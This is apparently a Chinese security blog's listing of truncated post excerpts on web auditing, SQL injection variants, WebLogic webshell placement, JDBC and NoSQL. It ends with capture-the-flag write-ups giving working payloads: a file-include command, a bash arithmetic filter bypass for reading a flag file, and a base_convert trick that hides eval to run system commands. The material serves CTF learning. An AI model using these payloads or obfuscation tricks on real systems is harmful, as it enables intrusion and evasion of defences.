环境安装源码下载地址：https://github.com/erichuang2015/kkcms php5.6 .9+mysql5.7.26+apache2.4.39 审计验证码复用 1<img src="../sy...

weblogic上传木马路径选择对于反序列化漏洞，如果获得的是系统权限或者root权限，那就没必要上传木马，但如果只是web安装应用的权限，就上传获取更大权限。 上传需要找到几个点，获取物理路径，如下面三种： 方法1：把shell写...

JDBCJDBC是什么Java DataBase Connectivity（Java语言连接数据库） 接口或类 作用 DriverManager类 1)管理和注册数据库驱动2)得到数据库连接对象 Connection接...

什么是NoSQLNoSQL，指的是非关系型的数据库。NoSQL 有时也称作 Not Only SQL 的缩写，是对不同于传统的关系型数据库的数据库管理系统的统称。NoSQL 用于超大规模数据的存储。（例如谷歌或 Facebook 每天...

sql异或注入当waf过滤了很多东西，但是没有过滤异或(^)符的时候使用。 什么是异或注入异步注入说简单一点就是在构造where后面的判断条件时使用^（异或符号）来达到sql注入攻击的目的 1^1=0 1^0=1 异或注入就是利用sq...

昨天我发现了一个问题 1234<?php$a='693741';$a=base_convert($a,10,36);$a(system("dir")); $a是36进制的eval转换成的...

order by比较大小盲注 这是表里的所有东西 如果我们执行select * from flag where id='' or 1 union select 1,1 order by 2;会出现 不能用and否则就...

什么是DNSlogDNS（Domain Name System）域名服务系统，简单的说就是域名与IP转换服务，比如用户输入a.com,DNS就会将a.com解析找到它真实的ip，以便于访问服务器上的相关服务，DNSlog就是存储在DN...

web69和web68一样。
payload:
1
c=include("/flag.txt");

web57
题目显示flag在36.php中，而且给出cat和php了，只要想办法构造出36就可以了。
$(())是做运算，$((${_}))=0,所以只要拼接除-36之后取反就行
payload:
1
?c=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))